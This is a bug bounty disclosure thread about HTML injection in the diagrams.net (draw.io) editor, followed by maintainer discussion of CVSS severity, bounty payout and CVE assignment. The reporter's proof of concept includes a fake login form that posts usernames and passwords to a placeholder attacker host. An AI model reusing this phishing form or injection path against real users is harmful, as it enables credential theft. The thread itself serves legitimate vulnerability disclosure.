Html Injection in jgraph/drawio
Reported on
May 6th 2022
Description
https://app.diagrams.net/ is vulnerable to html Injection by uploading a html file
Proof of Concept
- Goto https://app.diagrams.net/ and create a new html file with form field's and add this file in project
- Now goto file>embed>html and click on create after that click on preview page here we will see our all tags are rendered
- Now click on that form it will open new window with that form and click on print button
- Again click on preview to view preview of pdf and now you can enter username and password and submit it
- Form is working
- Rather than showing content of html file site will render it as html lead to html injection for eg if a file content a h1 tag it should look like this <h1>HTML tag</h1> Rather than rendering it
I have used this code for login page POC:- <html> <body> <h3>Login Form Post Method</h3> <div class="main" style="overflow:auto"> <fieldset class="fieldset">
<form action="https://Attacker control Host" method="post">
<label for="username">Username:</label>
<input class="userbox" type="text" name="username" required="required" /><br />
<label for="password">Password:</label>
<input type="text" name="password" required="required" />
<input class="button" type="submit" value="submit" />
</form>
<p><a href="#">Forget Username?</a> |  </a><a href="#">Forgot Password?</a></p>
</fieldset>
</div>
<p class="credit">Photo credit: More Than Me</p>
</body>
</html>
Impact
An attacker can trick victim to inject html in his browser
Thanks for the report. What is the version under the help menu at app.diagrams.net?
Would it be possible to format the report by bullet points to list each step at a time please? It's difficult to understand the exact steps in this format. Many thanks.
Hi its latest version 18.0.1 and you can find detail video over here https://youtu.be/fqk5jSzMRW4
Thanks for the detail. So, the form post is cross domain to any server?
yes it send request to attacker control domain
Thanks, we were able to repeat the issue. I agree the issue is valid, though I'm not sure the severity is high. The steps necessary from the user to provoke this are fairly rare for most users to follow.
If someone from huntr reads, is there a bug taxonomy like https://bugcrowd.com/vulnerability-rating-taxonomy availalbe?
Hi thanks for your review but since a user can share his work with other users an attacker will create a while template and share it with user so user only have to go to print page where an attacker can host a proper phishing page with post method enable with cross domains
And this is how an attacker can increase impact of this bug
Hi according to bug crowd it's P3 medium severity issue you can change it to medium thanks
An attacker can even share preview link to victim so there is no extra steps victim have to do
I’ve changed availabilty from high to none, since this doesn’t affect the availablity of the system.
In terms of the integrity (impact on the integrity of the exploited system), note that draw.io / diagrams.net doesn’t have any concept of a login. A user isn’t going to think they are logging into the site because there is no login. Why do you believe there is a high effect on the system integrity?
Confidentially describes the impact on the confidentiality of data processed by the system. There is no direct attack on data, since only the form contents can be extracted. The attack is around whether a user believe this is a real login screen, because they trust the domain. But I don’t see which login the user is being tricked into sending since we don’t have a site login. I think low is more appropriate in this case, it might even be none.
Would you agree with those changes?
We've ended up at a low following our process.
I see that moving the issue away from high meant the disclosure bounty went to zero. Our project pays out a minimum of 300USD (for low severity), so we will ensure you receive the 300USD if this is rated as a low.
I'm talking to huntr in the week about the funding process, we'll either make the payment to you via them or direct if that's not possible.
Hi thanks for everything i just want to know can you assign cve for this ?
@davidjgraph - regarding the taxonomy, we do not currently have this available, but I'd love to invite you to create a feature request, if you think it is important :)
I am speaking with huntr this week, I won't have any update until after I have spoken with them.
The increase to the bounty payment will come from Huntr, once our org is onboarded onto their systems.
Hello all 👋
The researcher bounty for this report has now been bumped from $0 to $300.
Congratulations @jo125ker 🤝
Hi @admin can you please assign cve
@davidjgraph - are you happy for us to proceed with assigning and publishing a CVE for this report?
@jamieslome Sure, I don't see any reason to not assign a CVE, unless you have a minimum severity. Is the report purely based on the original post?
@davidjgraph - we do not currently auto-assign CVEs for None or Low severities. However, if you could provide us with a CVSS vector string, we can go ahead and publish a CVE for this report 👍
OK, didn't see it was a low. Why a CVE for a low @gaurav-g2 ?